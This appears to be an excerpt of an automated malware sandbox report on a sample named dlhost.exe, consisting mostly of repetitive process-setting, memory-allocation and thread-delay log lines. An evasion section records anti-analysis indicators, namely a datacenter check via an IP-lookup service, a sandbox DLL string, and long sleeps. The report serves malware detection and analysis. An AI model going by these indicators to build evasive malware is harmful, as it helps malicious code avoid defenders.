                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\dlhost.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Check if machine is in data center or colocation facility
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: dlhost.exe, 00000000.00000002.3283011886.0000000002581000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: dlhost.exe, dlhost.exe.0.drBinary or memory string: SBIEDLL.DLLS9RQBKT3ZDRIMPQZW0WFSGFHPGHRKH9QSMQTYJ7F3PSZNGIC56BNQTXSQKJJJCKQCKLEFFNWYPWGCXL8G2QJSU2ZF9YYSLU8XXZPTI86I1JWHE9YM2LAYFFEUYEL3TSIIR9WAFASD44SYUE6CDTTSZCVPJRVPFRMDK1GEGLWSNCP1WYLVAZH0YD07IDKAHDW0K3OFLUICJBSKVFMM5SGKILOFLXYHI4VMZAJN5VV1JYGB6G2XCRBBZ2RTLOSS5TKCYK8TRS2UV9CRHMDGLG4SNFU1KKTP1XVFZVQUESMY02KXF3QC4V2V0FXOU23CYY3WFPR6IDREGI44N5YS3XSHOVBU9ZJG3X90VQEYUG2LHMF4KT1ZPPTBOIMGQSECNKMNPA57FHLPGZQMRFZROENYHJIEVMOHVAXHDMTSDYUS7E7Q1PCIQHU8ZP2SV5QZYQ2IHH64VNMFCW1Q6SZUEQKNFFCR1MVPNGNOXTPQYFUFH2NOFXBOGBAVPCMSHRMYNQ9LP6GN3AQK9QUUJPNYLI9RR8KPQWQFBLAQHSGSXDWUA8MEN4U8HLPJZ0MOCNMAHY8ZGNKKTDU4GDGINFO
                    Source: C:\Users\user\Desktop\dlhost.exeMemory allocated: 6E0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeMemory allocated: 1A580000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\dlhost.exeMemory allocated: 2710000 memory reserve | memory write watch
                    Source: C:\Users\user\dlhost.exeMemory allocated: 1A8E0000 memory reserve | memory write watch
                    Source: C:\Users\user\dlhost.exeMemory allocated: 1200000 memory reserve | memory write watch
                    Source: C:\Users\user\dlhost.exeMemory allocated: 1AFC0000 memory reserve | memory write watch
                    Source: C:\Users\user\dlhost.exeMemory allocated: DB0000 memory reserve | memory write watch
                    Source: C:\Users\user\dlhost.exeMemory allocated: 1A800000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599891Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599654Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598959Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598828Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598609Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598500Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598391Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598281Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598172Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597935Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597825Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597719Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597582Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597453Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597344Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597219Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 597110Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596985Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596860Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596735Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596610Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596485Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595236Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 595008Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594825Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594719Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594391Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594266Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594141Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 594031Jump to behavior
                    Source: C:\Users\user\Desktop\dlhost.exeThread delayed: delay time: 593922Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
